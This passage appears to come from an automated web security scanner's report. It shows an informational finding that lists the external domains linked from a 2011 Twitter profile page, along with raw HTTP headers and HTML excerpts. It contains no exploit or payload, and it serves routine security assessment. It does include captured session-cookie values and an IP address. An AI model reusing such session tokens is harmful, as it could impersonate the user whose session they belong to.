Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:31:32 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225092-82342-16130
ETag: "c59b4c0b9acbb0f08a369771fe895640"
Last-Modified: Fri, 28 Jan 2011 14:31:32 GMT
X-Runtime: 0.58927
Content-Type: text/html; charset=utf-8
Content-Length: 49556
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIklodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwP21h%250AeF9pZD0zMDc5MTc0MDcxNzgwMTQ3MiZwYWdlPTImdHd0dHI9dHJ1ZToMY3Ny%250AZl9pZCIlMTY0MTM2OGY1Njc4ZTgwNmU1ZTgxMGQ3YzZmMGI5YWY6B2lkIiUx%250AYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0%250AaW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoP%250AY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--dac63748d7ecba0fbd9f79424b096b92afb601f2; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</title>
<link href="http://a1.twimg.com/a/1296179758/images/twitter_57.png" rel="apple-touch-icon" />
<link href="/oexchange.xrd" rel="http://oexchange.org/spec/0.8/rel/related-target" type="application/xrd+xml" />
<link href="http://a1.twimg.com/a/1296179758/images/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<link rel="alternate" href="http://twitter.com/statuses/user_timeline/14594657.rss" title="malsup's Tweets" type="application/rss+xml" />
...[SNIP]...
<link rel="alternate" href="http://twitter.com/favorites/14594657.rss" title="malsup's Favorites" type="application/rss+xml" />

<link href="http://a2.twimg.com/a/1296179758/stylesheets/twitter.css?1296182306" media="screen" rel="stylesheet" type="text/css" />
<link href="http://a2.twimg.com/a/1296179758/stylesheets/geo.css?1296182306" media="screen" rel="stylesheet" type="text/css" />
<link href="http://a3.twimg.com/a/1296179758/stylesheets/buttons_new.css?1296182306" media="screen" rel="stylesheet" type="text/css" />
<style type="text/css">
...[SNIP]...
</style>
<link href="http://a1.twimg.com/a/1296179758/stylesheets/following.css?1296182306" media="screen, projection" rel="stylesheet" type="text/css" />

</head>
...[SNIP]...
<span id="loader" style="display:none"><img alt="Loader" src="http://a0.twimg.com/a/1296179758/images/loader.gif" /></span>
...[SNIP]...
<a href="http://twitter.com/" title="Twitter / Home" accesskey="1" id="logo">
<img alt="Twitter.com" src="http://a0.twimg.com/a/1296179758/images/twitter_logo_header.png" />
</a>
...[SNIP]...
<a href="/account/profile_image/malsup?hreflang=en"><img alt="" border="0" height="73" id="profile-image" src="http://a1.twimg.com/profile_images/725487795/michael_bigger.jpg" valign="middle" width="73" /></a>
...[SNIP]...
</a> I think you listed all the relevant props that aren't documented at <a href="http://bit.ly/a90m3b" class="tweet-url web" rel="nofollow" target="_blank">http://bit.ly/a90m3b</a>
...[SNIP]...
<span>via <a href="http://itunes.apple.com/us/app/twitter/id409789998?mt=12" rel="nofollow">Twitter for Mac</a>
...[SNIP]...
<span>via <a href="http://itunes.apple.com/us/app/twitter/id409789998?mt=12" rel="nofollow">Twitter for Mac</a>
...[SNIP]...
<span>via <a href="http://itunes.apple.com/us/app/twitter/id409789998?mt=12" rel="nofollow">Twitter for Mac</a>
...[SNIP]...
<span>via <a href="http://itunes.apple.com/us/app/twitter/id409789998?mt=12" rel="nofollow">Twitter for Mac</a>
...[SNIP]...
<span>via <a href="http://itunes.apple.com/us/app/twitter/id409789998?mt=12" rel="nofollow">Twitter for Mac</a>
...[SNIP]...
<span>via <a href="http://itunes.apple.com/us/app/twitter/id409789998?mt=12" rel="nofollow">Twitter for Mac</a>
...[SNIP]...
<span>via <a href="http://itunes.apple.com/us/app/twitter/id409789998?mt=12" rel="nofollow">Twitter for Mac</a>
...[SNIP]...
<span>via <a href="http://itunes.apple.com/us/app/twitter/id409789998?mt=12" rel="nofollow">Twitter for Mac</a>
...[SNIP]...
<span>via <a href="http://itunes.apple.com/us/app/twitter/id409789998?mt=12" rel="nofollow">Twitter for Mac</a>
...[SNIP]...
<span>via <a href="http://itunes.apple.com/us/app/twitter/id409789998?mt=12" rel="nofollow">Twitter for Mac</a>
...[SNIP]...
<span>via <a href="http://itunes.apple.com/us/app/twitter/id409789998?mt=12" rel="nofollow">Twitter for Mac</a>
...[SNIP]...
</a> <a href="http://t.co/7uqdg3u" class="tweet-url web" rel="nofollow" target="_blank">http://t.co/7uqdg3u</a>
...[SNIP]...
<span>via <a href="http://itunes.apple.com/us/app/twitter/id409789998?mt=12" rel="nofollow">Twitter for Mac</a>
...[SNIP]...
<span>via <a href="http://itunes.apple.com/us/app/twitter/id409789998?mt=12" rel="nofollow">Twitter for Mac</a>
...[SNIP]...
</a> <a href="http://t.co/djfgFrh" class="tweet-url web" rel="nofollow" target="_blank">http://t.co/djfgFrh</a>
...[SNIP]...
<span>via <a href="http://itunes.apple.com/us/app/twitter/id409789998?mt=12" rel="nofollow">Twitter for Mac</a>
...[SNIP]...
<span>via <a href="http://itunes.apple.com/us/app/twitter/id409789998?mt=12" rel="nofollow">Twitter for Mac</a>
...[SNIP]...
<a href="/PureADK" class="url" hreflang="en" rel="contact" title="The Adirondacks"><img alt="The Adirondacks" class="photo fn" height="24" src="http://a0.twimg.com/profile_images/1179551939/twitter_mini.jpg" width="24" /></a>
...[SNIP]...
<a href="/townsandtrails" class="url" hreflang="en" rel="contact" title="Towns and Trails"><img alt="Towns and Trails" class="photo fn" height="24" src="http://a1.twimg.com/profile_images/1154599293/townsandtrails_logo_mini.png" width="24" /></a>
...[SNIP]...
<a href="/bennadel" class="url" hreflang="en" rel="contact" title="Ben Nadel"><img alt="Ben Nadel" class="photo fn" height="24" src="http://a0.twimg.com/profile_images/429483912/ben_twitter_mini.jpg" width="24" /></a>
...[SNIP]...
<a href="/rachbarnhart" class="url" hreflang="en" rel="contact" title="Rachel Barnhart"><img alt="Rachel Barnhart" class="photo fn" height="24" src="http://a0.twimg.com/profile_images/1123004358/rachel100_mini.jpg" width="24" /></a>
...[SNIP]...
<a href="/sitepointdotcom" class="url" hreflang="en" rel="contact" title="SitePoint"><img alt="SitePoint" class="photo fn" height="24" src="http://a2.twimg.com/profile_images/76953980/Picture_29_mini.png" width="24" /></a>
...[SNIP]...
<a href="/Servigistics" class="url" hreflang="en" rel="contact" title="Servigistics "><img alt="Servigistics " class="photo fn" height="24" src="http://a2.twimg.com/profile_images/1077967086/twitter_swirl_mini.jpg" width="24" /></a>
...[SNIP]...
<a href="/travis" class="url" hreflang="en" rel="contact" title="Travis Hardiman"><img alt="Travis Hardiman" class="photo fn" height="24" src="http://a1.twimg.com/profile_images/1205752711/madmen_icon_mini.jpg" width="24" /></a>
...[SNIP]...
<a href="/waynecountylife" class="url" hreflang="en" rel="contact" title="Wayne County Life"><img alt="Wayne County Life" class="photo fn" height="24" src="http://a0.twimg.com/profile_images/266392931/wcl_logo_v2_mini.jpg" width="24" /></a>
...[SNIP]...
<a href="/rem" class="url" hreflang="en" rel="contact" title="Remy Sharp"><img alt="Remy Sharp" class="photo fn" height="24" src="http://a2.twimg.com/profile_images/82806383/remysharp_mini.jpg" width="24" /></a>
...[SNIP]...
<a href="/scott_gonzalez" class="url" hreflang="en" rel="contact" title="Scott Gonz..lez"><img alt="Scott Gonz..lez" class="photo fn" height="24" src="http://a2.twimg.com/profile_images/156932880/fro_mini.png" width="24" /></a>
...[SNIP]...
<a href="/creationix" class="url" hreflang="en" rel="contact" title="Tim Caswell"><img alt="Tim Caswell" class="photo fn" height="24" src="http://a2.twimg.com/profile_images/774817444/c953ddd239707998340e1a6fbb3eeb46_mini.jpeg" width="24" /></a>
...[SNIP]...
<a href="/ryanolson" class="url" hreflang="en" rel="contact" title="thatryan"><img alt="thatryan" class="photo fn" height="24" src="http://a2.twimg.com/profile_images/1196913486/148824_1641117021474_1043276372_1788445_2752216_n_mini.jpg" width="24" /></a>
...[SNIP]...
<a href="/webandy" class="url" hreflang="en" rel="contact" title="Andy Atkinson"><img alt="Andy Atkinson" class="photo fn" height="24" src="http://a1.twimg.com/profile_images/1100688452/headshot_mini.jpg" width="24" /></a>
...[SNIP]...
<a href="/miketaylr" class="url" hreflang="en" rel="contact" title="Mike Taylor"><img alt="Mike Taylor" class="photo fn" height="24" src="http://a2.twimg.com/profile_images/1042621997/mikeyyyy_mini.png" width="24" /></a>
...[SNIP]...
<a href="/joemccann" class="url" hreflang="en" rel="contact" title="Joe McCann"><img alt="Joe McCann" class="photo fn" height="24" src="http://a3.twimg.com/profile_images/1053216581/joe-head-with-hat_128x128_mini.jpg" width="24" /></a>
...[SNIP]...
<a href="/Support" class="url" hreflang="en" rel="contact" title="Support"><img alt="Support" class="photo fn" height="24" src="http://a1.twimg.com/profile_images/1164188883/support_mini.png" width="24" /></a>
...[SNIP]...
<a href="/ebello" class="url" hreflang="en" rel="contact" title="Ernie Bello"><img alt="Ernie Bello" class="photo fn" height="24" src="http://a3.twimg.com/profile_images/47266842/me2_mini.JPG" width="24" /></a>
...[SNIP]...
<a href="/TechCrunch" class="url" hreflang="en" rel="contact" title="TechCrunch"><img alt="TechCrunch" class="photo fn" height="24" src="http://a1.twimg.com/profile_images/115466107/techcrunch_bigger_mini.png" width="24" /></a>
...[SNIP]...
<a href="/messengerpost" class="url" hreflang="en" rel="contact" title="messengerpost"><img alt="messengerpost" class="photo fn" height="24" src="http://a2.twimg.com/profile_images/69345786/twitter_icon_mini.jpg" width="24" /></a>
...[SNIP]...
<a href="/Script_Junkie" class="url" hreflang="en" rel="contact" title="Script Junkie"><img alt="Script Junkie" class="photo fn" height="24" src="http://a0.twimg.com/profile_images/938927592/sjunk_trunc_mini.png" width="24" /></a>
...[SNIP]...
<a href="/stubbornella" class="url" hreflang="en" rel="contact" title="Nicole Sullivan"><img alt="Nicole Sullivan" class="photo fn" height="24" src="http://a1.twimg.com/profile_images/72157651/tattoo_pink_bkg_square_mini.jpg" width="24" /></a>
...[SNIP]...
<a href="/danwrong" class="url" hreflang="en" rel="contact" title="Dan Webb"><img alt="Dan Webb" class="photo fn" height="24" src="http://a1.twimg.com/profile_images/692828214/avatar_mini.jpg" width="24" /></a>
...[SNIP]...
<a href="/SlexAxton" class="url" hreflang="en" rel="contact" title="Alex Sexton"><img alt="Alex Sexton" class="photo fn" height="24" src="http://a2.twimg.com/profile_images/505590110/1ac219a6360a061d1ab2dbdc93435c96_mini.jpeg" width="24" /></a>
...[SNIP]...
<a href="/davevogler" class="url" hreflang="en" rel="contact" title="Dave Vogler"><img alt="Dave Vogler" class="photo fn" height="24" src="http://a1.twimg.com/profile_images/1147359486/dave-vogler-50_mini.jpg" width="24" /></a>
...[SNIP]...
<a href="/ExpertDan" class="url" hreflang="en" rel="contact" title="Dan DeFelippi"><img alt="Dan DeFelippi" class="photo fn" height="24" src="http://a1.twimg.com/profile_images/1171493203/headshot-11-20-10_mini.jpg" width="24" /></a>
...[SNIP]...
<a href="/dandenney" class="url" hreflang="en" rel="contact" title="Dan Denney"><img alt="Dan Denney" class="photo fn" height="24" src="http://a1.twimg.com/profile_images/1216037299/dan-social-avatar_mini.png" width="24" /></a>
...[SNIP]...
<a href="/androidnewsblog" class="url" hreflang="en" rel="contact" title="Google Android Blog"><img alt="Google Android Blog" class="photo fn" height="24" src="http://a0.twimg.com/profile_images/349012784/android_logo_small_mini.jpg" width="24" /></a>
...[SNIP]...
<a href="/cowboy" class="url" hreflang="en" rel="contact" title="Ben Alman"><img alt="Ben Alman" class="photo fn" height="24" src="http://a0.twimg.com/profile_images/860569124/headshot_kangol_200_mini.jpg" width="24" /></a>
...[SNIP]...
<a href="/Svantasukhai" class="url" hreflang="en" rel="contact" title="Vivek Dube"><img alt="Vivek Dube" class="photo fn" height="24" src="http://a1.twimg.com/a/1294957282/images/default_profile_2_mini.png" width="24" /></a>
...[SNIP]...
<a href="/ajpiano" class="url" hreflang="en" rel="contact" title="adam j.sontag"><img alt="adam j.sontag" class="photo fn" height="24" src="http://a0.twimg.com/profile_images/530311059/twitpic_mini.jpg" width="24" /></a>
...[SNIP]...
<a href="/mennovanslooten" class="url" hreflang="en" rel="contact" title="Menno van Slooten"><img alt="Menno van Slooten" class="photo fn" height="24" src="http://a1.twimg.com/profile_images/1121468480/headshot_mini.jpg" width="24" /></a>
...[SNIP]...
<a href="/rwaldron" class="url" hreflang="en" rel="contact" title="rick waldron"><img alt="rick waldron" class="photo fn" height="24" src="http://a2.twimg.com/profile_images/732025391/rick_jedi_avatar_mini.jpg" width="24" /></a>
...[SNIP]...
<a href="/dougneiner" class="url" hreflang="en" rel="contact" title="Douglas Neiner"><img alt="Douglas Neiner" class="photo fn" height="24" src="http://a0.twimg.com/profile_images/1219117972/doug-html5-2_mini.jpg" width="24" /></a>
...[SNIP]...
<a href="/RobertDuffy" class="url" hreflang="en" rel="contact" title="RobertDuffy"><img alt="RobertDuffy" class="photo fn" height="24" src="http://a1.twimg.com/profile_images/39840022/n647511610_73231_8183_mini.jpg" width="24" /></a>
...[SNIP]...
<a href="/gercheq" class="url" hreflang="en" rel="contact" title="Gercek Karakus"><img alt="Gercek Karakus" class="photo fn" height="24" src="http://a2.twimg.com/profile_images/692950475/gercekkarakus_mini.png" width="24" /></a>
...[SNIP]...
<a href="/sentience" class="url" hreflang="en" rel="contact" title="Kevin Yank"><img alt="Kevin Yank" class="photo fn" height="24" src="http://a0.twimg.com/profile_images/275486302/avatar_highres_mini.jpg" width="24" /></a>
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/dismissable.js?1296182306" type="text/javascript"></script>
...[SNIP]...

17.256. http://twitter.com/malsup previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/malsup

Issue detail

The page was loaded from a URL containing a query string:

http://twitter.com/malsup?max_id=30791740717801472&page=2&twttr=true

The response contains the following links to other domains:

http://a0.twimg.com/a/1296179758/images/loader.gif
http://a0.twimg.com/a/1296179758/images/twitter_logo_header.png
http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726
http://a0.twimg.com/a/1296179758/stylesheets/buttons_new.css?1296181726
http://a0.twimg.com/a/1296179758/stylesheets/geo.css?1296181726
http://a0.twimg.com/profile_images/1123004358/rachel100_mini.jpg
http://a0.twimg.com/profile_images/1179551939/twitter_mini.jpg
http://a0.twimg.com/profile_images/1219117972/doug-html5-2_mini.jpg
http://a0.twimg.com/profile_images/266392931/wcl_logo_v2_mini.jpg
http://a0.twimg.com/profile_images/275486302/avatar_highres_mini.jpg
http://a0.twimg.com/profile_images/349012784/android_logo_small_mini.jpg
http://a0.twimg.com/profile_images/429483912/ben_twitter_mini.jpg
http://a0.twimg.com/profile_images/530311059/twitpic_mini.jpg
http://a0.twimg.com/profile_images/860569124/headshot_kangol_200_mini.jpg
http://a0.twimg.com/profile_images/938927592/sjunk_trunc_mini.png
http://a1.twimg.com/a/1294957282/images/default_profile_2_mini.png
http://a1.twimg.com/a/1296179758/images/favicon.ico
http://a1.twimg.com/a/1296179758/images/twitter_57.png
http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726
http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726
http://a1.twimg.com/profile_images/1100688452/headshot_mini.jpg
http://a1.twimg.com/profile_images/1121468480/headshot_mini.jpg
http://a1.twimg.com/profile_images/1147359486/dave-vogler-50_mini.jpg
http://a1.twimg.com/profile_images/1154599293/townsandtrails_logo_mini.png
http://a1.twimg.com/profile_images/115466107/techcrunch_bigger_mini.png
http://a1.twimg.com/profile_images/1164188883/support_mini.png
http://a1.twimg.com/profile_images/1171493203/headshot-11-20-10_mini.jpg
http://a1.twimg.com/profile_images/1205752711/madmen_icon_mini.jpg
http://a1.twimg.com/profile_images/1216037299/dan-social-avatar_mini.png
http://a1.twimg.com/profile_images/39840022/n647511610_73231_8183_mini.jpg
http://a1.twimg.com/profile_images/692828214/avatar_mini.jpg
http://a1.twimg.com/profile_images/72157651/tattoo_pink_bkg_square_mini.jpg
http://a1.twimg.com/profile_images/725487795/michael_bigger.jpg
http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726
http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726
http://a2.twimg.com/profile_images/1042621997/mikeyyyy_mini.png
http://a2.twimg.com/profile_images/1077967086/twitter_swirl_mini.jpg
http://a2.twimg.com/profile_images/1196913486/148824_1641117021474_1043276372_1788445_2752216_n_mini.jpg
http://a2.twimg.com/profile_images/156932880/fro_mini.png
http://a2.twimg.com/profile_images/505590110/1ac219a6360a061d1ab2dbdc93435c96_mini.jpeg
http://a2.twimg.com/profile_images/692950475/gercekkarakus_mini.png
http://a2.twimg.com/profile_images/69345786/twitter_icon_mini.jpg
http://a2.twimg.com/profile_images/732025391/rick_jedi_avatar_mini.jpg
http://a2.twimg.com/profile_images/76953980/Picture_29_mini.png
http://a2.twimg.com/profile_images/774817444/c953ddd239707998340e1a6fbb3eeb46_mini.jpeg
http://a2.twimg.com/profile_images/82806383/remysharp_mini.jpg
http://a3.twimg.com/a/1296179758/javascripts/dismissable.js?1296181726
http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726
http://a3.twimg.com/a/1296179758/stylesheets/following.css?1296181726
http://a3.twimg.com/a/1296179758/stylesheets/twitter.css?1296181726
http://a3.twimg.com/profile_images/1053216581/joe-head-with-hat_128x128_mini.jpg
http://a3.twimg.com/profile_images/47266842/me2_mini.JPG
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://bit.ly/a90m3b
http://itunes.apple.com/us/app/twitter/id409789998?mt=12
http://t.co/7uqdg3u
http://t.co/djfgFrh
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:25:35 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224735-52029-12720
ETag: "aeaf54f4215cc48cd19c989655f24a99"
Last-Modified: Fri, 28 Jan 2011 14:25:35 GMT
X-Runtime: 0.56131
Content-Type: text/html; charset=utf-8
Content-Length: 49556
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIklodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwP21h%250AeF9pZD0zMDc5MTc0MDcxNzgwMTQ3MiZwYWdlPTImdHd0dHI9dHJ1ZToMY3Ny%250AZl9pZCIlNDM5ZDJhZDU1OTViNDQ5ZTA5MDQ2OTZhYWM5NGEwZTE6B2lkIiUx%250AYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0%250AaW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoP%250AY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--acdb87a3f02b633f4834e75acc9f4d30780c1b05; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</title>
<link href="http://a1.twimg.com/a/1296179758/images/twitter_57.png" rel="apple-touch-icon" />
<link href="/oexchange.xrd" rel="http://oexchange.org/spec/0.8/rel/related-target" type="application/xrd+xml" />
<link href="http://a1.twimg.com/a/1296179758/images/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<link rel="alternate" href="http://twitter.com/statuses/user_timeline/14594657.rss" title="malsup's Tweets" type="application/rss+xml" />
...[SNIP]...
<link rel="alternate" href="http://twitter.com/favorites/14594657.rss" title="malsup's Favorites" type="application/rss+xml" />

<link href="http://a3.twimg.com/a/1296179758/stylesheets/twitter.css?1296181726" media="screen" rel="stylesheet" type="text/css" />
<link href="http://a0.twimg.com/a/1296179758/stylesheets/geo.css?1296181726" media="screen" rel="stylesheet" type="text/css" />
<link href="http://a0.twimg.com/a/1296179758/stylesheets/buttons_new.css?1296181726" media="screen" rel="stylesheet" type="text/css" />
<style type="text/css">
...[SNIP]...
</style>
<link href="http://a3.twimg.com/a/1296179758/stylesheets/following.css?1296181726" media="screen, projection" rel="stylesheet" type="text/css" />

</head>
...[SNIP]...
<span id="loader" style="display:none"><img alt="Loader" src="http://a0.twimg.com/a/1296179758/images/loader.gif" /></span>
...[SNIP]...
<a href="http://twitter.com/" title="Twitter / Home" accesskey="1" id="logo">
<img alt="Twitter.com" src="http://a0.twimg.com/a/1296179758/images/twitter_logo_header.png" />
</a>
...[SNIP]...
<a href="/account/profile_image/malsup?hreflang=en"><img alt="" border="0" height="73" id="profile-image" src="http://a1.twimg.com/profile_images/725487795/michael_bigger.jpg" valign="middle" width="73" /></a>
...[SNIP]...
</a> I think you listed all the relevant props that aren't documented at <a href="http://bit.ly/a90m3b" class="tweet-url web" rel="nofollow" target="_blank">http://bit.ly/a90m3b</a>
...[SNIP]...
<span>via <a href="http://itunes.apple.com/us/app/twitter/id409789998?mt=12" rel="nofollow">Twitter for Mac</a>
...[SNIP]...
<span>via <a href="http://itunes.apple.com/us/app/twitter/id409789998?mt=12" rel="nofollow">Twitter for Mac</a>
...[SNIP]...
<span>via <a href="http://itunes.apple.com/us/app/twitter/id409789998?mt=12" rel="nofollow">Twitter for Mac</a>
...[SNIP]...
<span>via <a href="http://itunes.apple.com/us/app/twitter/id409789998?mt=12" rel="nofollow">Twitter for Mac</a>
...[SNIP]...
<span>via <a href="http://itunes.apple.com/us/app/twitter/id409789998?mt=12" rel="nofollow">Twitter for Mac</a>
...[SNIP]...
<span>via <a href="http://itunes.apple.com/us/app/twitter/id409789998?mt=12" rel="nofollow">Twitter for Mac</a>
...[SNIP]...
<span>via <a href="http://itunes.apple.com/us/app/twitter/id409789998?mt=12" rel="nofollow">Twitter for Mac</a>
...[SNIP]...
<span>via <a href="http://itunes.apple.com/us/app/twitter/id409789998?mt=12" rel="nofollow">Twitter for Mac</a>
...[SNIP]...
<span>via <a href="http://itunes.apple.com/us/app/twitter/id409789998?mt=12" rel="nofollow">Twitter for Mac</a>
...[SNIP]...
<span>via <a href="http://itunes.apple.com/us/app/twitter/id409789998?mt=12" rel="nofollow">Twitter for Mac</a>
...[SNIP]...
<span>via <a href="http://itunes.apple.com/us/app/twitter/id409789998?mt=12" rel="nofollow">Twitter for Mac</a>
...[SNIP]...
</a> <a href="http://t.co/7uqdg3u" class="tweet-url web" rel="nofollow" target="_blank">http://t.co/7uqdg3u</a>
...[SNIP]...
<span>via <a href="http://itunes.apple.com/us/app/twitter/id409789998?mt=12" rel="nofollow">Twitter for Mac</a>
...[SNIP]...
<span>via <a href="http://itunes.apple.com/us/app/twitter/id409789998?mt=12" rel="nofollow">Twitter for Mac</a>
...[SNIP]...
</a> <a href="http://t.co/djfgFrh" class="tweet-url web" rel="nofollow" target="_blank">http://t.co/djfgFrh</a>
...[SNIP]...
<span>via <a href="http://itunes.apple.com/us/app/twitter/id409789998?mt=12" rel="nofollow">Twitter for Mac</a>
...[SNIP]...
<span>via <a href="http://itunes.apple.com/us/app/twitter/id409789998?mt=12" rel="nofollow">Twitter for Mac</a>
...[SNIP]...
<a href="/PureADK" class="url" hreflang="en" rel="contact" title="The Adirondacks"><img alt="The Adirondacks" class="photo fn" height="24" src="http://a0.twimg.com/profile_images/1179551939/twitter_mini.jpg" width="24" /></a>
...[SNIP]...
<a href="/townsandtrails" class="url" hreflang="en" rel="contact" title="Towns and Trails"><img alt="Towns and Trails" class="photo fn" height="24" src="http://a1.twimg.com/profile_images/1154599293/townsandtrails_logo_mini.png" width="24" /></a>
...[SNIP]...
<a href="/bennadel" class="url" hreflang="en" rel="contact" title="Ben Nadel"><img alt="Ben Nadel" class="photo fn" height="24" src="http://a0.twimg.com/profile_images/429483912/ben_twitter_mini.jpg" width="24" /></a>
...[SNIP]...
<a href="/rachbarnhart" class="url" hreflang="en" rel="contact" title="Rachel Barnhart"><img alt="Rachel Barnhart" class="photo fn" height="24" src="http://a0.twimg.com/profile_images/1123004358/rachel100_mini.jpg" width="24" /></a>
...[SNIP]...
<a href="/sitepointdotcom" class="url" hreflang="en" rel="contact" title="SitePoint"><img alt="SitePoint" class="photo fn" height="24" src="http://a2.twimg.com/profile_images/76953980/Picture_29_mini.png" width="24" /></a>
...[SNIP]...
<a href="/Servigistics" class="url" hreflang="en" rel="contact" title="Servigistics "><img alt="Servigistics " class="photo fn" height="24" src="http://a2.twimg.com/profile_images/1077967086/twitter_swirl_mini.jpg" width="24" /></a>
...[SNIP]...
<a href="/travis" class="url" hreflang="en" rel="contact" title="Travis Hardiman"><img alt="Travis Hardiman" class="photo fn" height="24" src="http://a1.twimg.com/profile_images/1205752711/madmen_icon_mini.jpg" width="24" /></a>
...[SNIP]...
<a href="/waynecountylife" class="url" hreflang="en" rel="contact" title="Wayne County Life"><img alt="Wayne County Life" class="photo fn" height="24" src="http://a0.twimg.com/profile_images/266392931/wcl_logo_v2_mini.jpg" width="24" /></a>
...[SNIP]...
<a href="/rem" class="url" hreflang="en" rel="contact" title="Remy Sharp"><img alt="Remy Sharp" class="photo fn" height="24" src="http://a2.twimg.com/profile_images/82806383/remysharp_mini.jpg" width="24" /></a>
...[SNIP]...
<a href="/scott_gonzalez" class="url" hreflang="en" rel="contact" title="Scott Gonz..lez"><img alt="Scott Gonz..lez" class="photo fn" height="24" src="http://a2.twimg.com/profile_images/156932880/fro_mini.png" width="24" /></a>
...[SNIP]...
<a href="/creationix" class="url" hreflang="en" rel="contact" title="Tim Caswell"><img alt="Tim Caswell" class="photo fn" height="24" src="http://a2.twimg.com/profile_images/774817444/c953ddd239707998340e1a6fbb3eeb46_mini.jpeg" width="24" /></a>
...[SNIP]...
<a href="/ryanolson" class="url" hreflang="en" rel="contact" title="thatryan"><img alt="thatryan" class="photo fn" height="24" src="http://a2.twimg.com/profile_images/1196913486/148824_1641117021474_1043276372_1788445_2752216_n_mini.jpg" width="24" /></a>
...[SNIP]...
<a href="/webandy" class="url" hreflang="en" rel="contact" title="Andy Atkinson"><img alt="Andy Atkinson" class="photo fn" height="24" src="http://a1.twimg.com/profile_images/1100688452/headshot_mini.jpg" width="24" /></a>
...[SNIP]...
<a href="/miketaylr" class="url" hreflang="en" rel="contact" title="Mike Taylor"><img alt="Mike Taylor" class="photo fn" height="24" src="http://a2.twimg.com/profile_images/1042621997/mikeyyyy_mini.png" width="24" /></a>
...[SNIP]...
<a href="/joemccann" class="url" hreflang="en" rel="contact" title="Joe McCann"><img alt="Joe McCann" class="photo fn" height="24" src="http://a3.twimg.com/profile_images/1053216581/joe-head-with-hat_128x128_mini.jpg" width="24" /></a>
...[SNIP]...
<a href="/Support" class="url" hreflang="en" rel="contact" title="Support"><img alt="Support" class="photo fn" height="24" src="http://a1.twimg.com/profile_images/1164188883/support_mini.png" width="24" /></a>
...[SNIP]...
<a href="/ebello" class="url" hreflang="en" rel="contact" title="Ernie Bello"><img alt="Ernie Bello" class="photo fn" height="24" src="http://a3.twimg.com/profile_images/47266842/me2_mini.JPG" width="24" /></a>
...[SNIP]...
